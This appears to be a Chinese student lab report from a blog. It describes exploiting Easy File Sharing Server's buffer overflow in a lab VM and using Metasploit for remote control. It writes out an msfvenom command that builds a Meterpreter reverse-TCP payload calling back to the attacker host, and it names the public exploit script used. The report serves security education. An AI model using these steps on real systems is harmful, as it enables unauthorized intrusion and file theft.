1. 实验目的和要求
一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
2.实验步骤
一、漏洞渗透测试
用nmap 192.168.xxx.0/24 命令扫描同一网段下的主机,发现靶机的IP为192.168.107.130
已经确定了靶机的IP后,用nmap -sV 192.168.107.130 更加细致的扫描端口,以及端口的服务
在靶机中运行easy file sharing server 后,发现其用到了80和443端口
靶机打开了easy file sharing server后,再次扫描靶机的端口和服务,发现80和443端口都对应上了easy file sharing server 服务
在kali自带地漏洞脚本库中搜索相关漏洞,即输入命令为:searchsploit easy file sharing server
由于我们利用的是easy file sharing server 的溢出漏洞,所以我们找到39009.py这个漏洞脚本,其相关描述为“HEAD Request Buffer Overflow (SHE)”,正是我们需要的
我们执行攻击脚本
可以看到,靶机成功自动打开了计算器
二、Metasploit应用
输入命令 :“ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.128 lport=5000 -f exe -o /home/kali/Desktop/payload.exe” 生成被控端,其中ip和端口都使用的是kali的ip 和端口。
可以看到桌面成功生成了payload.exe文件
在靶机中下载刚刚生成的payload.exe
输入msfconsole,打开Metasploit
依次输入上图中的五个命令,等待靶机运行payload.exe 文件,就可以对其进行控制
在靶机运行了payload.exe文件后,kali中看到成功建立了连接
在靶机的桌面上,我们放置一张图片,后面我们将在kali中下载该图片
总结:
本次复现实验,掌握了相关软件漏洞的利用、“木马病毒”的生成和使用。让我们明白了相关服务或者软件一旦存在漏洞,并被利用,其危害是不可想象的,而且一旦成功制作了针对该漏洞的脚本或特定软件,其实施攻击是非常简单的。
同时,我们电脑的防火墙和杀毒软件若不是特定需要,一定不能关掉,对不明来源的应用程序或其他文件,一定不能轻易下载和运行。这样可以有效的防止类似于上述实验中“payload.exe ”式的攻击。
标签:exe,server,漏洞,任务,复现,easy,靶机,payload From: https://www.cnblogs.com/mww-i-xy/p/16916603.html